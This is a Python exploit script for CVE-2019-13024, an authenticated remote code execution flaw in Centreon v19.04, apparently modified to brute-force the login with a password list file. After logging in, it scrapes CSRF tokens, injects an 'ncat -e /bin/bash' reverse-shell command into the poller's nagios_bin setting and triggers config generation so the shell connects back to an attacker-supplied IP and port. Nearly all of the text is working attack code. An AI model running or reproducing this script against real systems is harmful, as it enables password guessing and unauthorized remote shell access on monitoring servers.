Untitled

#!/usr/bin/python

'''
# Exploit Title: Centreon v19.04 authenticated Remote Code Execution
# Date: 28/06/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-13024
# Vendor Homepage: https://www.centreon.com/
# Software link: https://download.centreon.com
# Version: v19.04
# Tested on: CentOS 7.6 / PHP 5.4.16
'''

import requests
import sys
import warnings
from bs4 import BeautifulSoup

# turn off BeautifulSoup warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./centreon-exploit.py url username password ip port")
    exit()
with open('best110.txt', 'r') as passlist:
    plist = passlist.readlines()
with open('tt.txt', 'r') as userlist:
    ulist = userlist.readlines()

for password in plist:
    password=password.strip()


    url = sys.argv[1]
    username = sys.argv[2]
    ip = sys.argv[4]
    port = sys.argv[5]


    request = requests.session()
    print("[+] Retrieving CSRF token to submit the login form")
    page = request.get(url+"/index.php")
    html_content = page.text
    soup = BeautifulSoup(html_content)
    token = soup.findAll('input')[3].get("value")

    login_info = {
        "useralias": username,
        "password": password,
        "submitLogin": "Connect",
        "centreon_token": token
    }
    login_request = request.post(url+"/index.php", login_info)
    print("[+] Login token is : {0}".format(token))
    if "Your credentials are incorrect." not in login_request.text:
        print("[+] Logged In Sucssfully", username, password)
        print("[+] Retrieving Poller token")

        poller_configuration_page = url + "/main.get.php?p=60901"
        get_poller_token = request.get(poller_configuration_page)
        poller_html = get_poller_token.text
        poller_soup = BeautifulSoup(poller_html)
        poller_token = poller_soup.findAll('input')[24].get("value")
        print("[+] Poller token is : {0}".format(poller_token))

        payload_info = {
            "name": "Central",
            "ns_ip_address": "127.0.0.1",
            # this value should be 1 always
            "localhost[localhost]": "1",
            "is_default[is_default]": "0",
            "remote_id": "",
            "ssh_port": "22",
            "init_script": "centengine",
            # this value contains the payload , you can change it as you want
            "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
            "nagiostats_bin": "/usr/sbin/centenginestats",
            "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
            "centreonbroker_cfg_path": "/etc/centreon-broker",
            "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
            "centreonbroker_logs_path": "",
            "centreonconnector_path": "/usr/lib64/centreon-connector",
            "init_script_centreontrapd": "centreontrapd",
            "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
            "ns_activate[ns_activate]": "1",
            "submitC": "Save",
            "id": "1",
            "o": "c",
            "centreon_token": poller_token,


        }

        send_payload = request.post(poller_configuration_page, payload_info)
        print("[+] Injecting Done, triggering the payload")
        print("[+] Check your netcat listener !")
        generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"
        xml_page_data = {
            "poller": "1",
            "debug": "true",
            "generate": "true",
        }
        request.post(generate_xml_page, xml_page_data)

    #else:
        #print("[-] Wrong credentials", password, username)